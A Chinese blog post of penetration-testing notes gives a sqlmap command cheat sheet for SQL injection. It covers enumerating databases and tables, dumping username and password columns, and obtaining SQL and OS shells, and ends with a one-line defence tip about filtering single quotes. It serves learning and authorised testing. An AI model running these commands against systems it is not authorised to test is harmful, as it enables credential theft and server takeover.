渗透测试笔记(四)——SQL注入攻击及防御(2)

SQLmap自动化注入

GET方法注入

 sqlmap -u "URL" -dbms=mysql --batch
 sqlmap -u "URL" --dbs
 sqlmap -u "URL" --users
 sqlmap -u "URL" --current-user
 ​
 # 获得当前数据库
 sqlmap -u "URL" --current-db
 ​
 # 获得数据库表
 sqlmap -u "URL" --batch -p username -D wordpress --tables
 ​
 # 获得表的字段
 sqlmap -u "URL" --batch -p username -D wordpress -T wp_users --columns
 ​
 # 获得表中的数据
 sqlmap -u "URL" --batch -D nowasp -T accounts -C "username, password"

POST方法注入

 # 需要Cookie才能访问的页面
 sqlmap -u "URL" --cookie="COOKIE" --batch
 sqlmap -u "URL" --cookie="COOKIE" --batch -p id

注意:复制cookie的时候要把中间的冒号改为等号

数据获取

 --users
 --current-user
 --dbs
 --current-db
 -D "database_name" --tables
 -D "database_name" -T "table_name" --columns
 --dump-all
 --dump-all --exclude-sysdbs
 -D "database_name" -T "table_name" -C "username,password" --dump

提权操作

 # 与数据库交互
 --sql-shell
 ​
 # 操作系统权限
 --os-shell
 --os-cmd=ls /

综合实例

SQL注入防御

开发人员对输入内容进行单引号的过滤

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值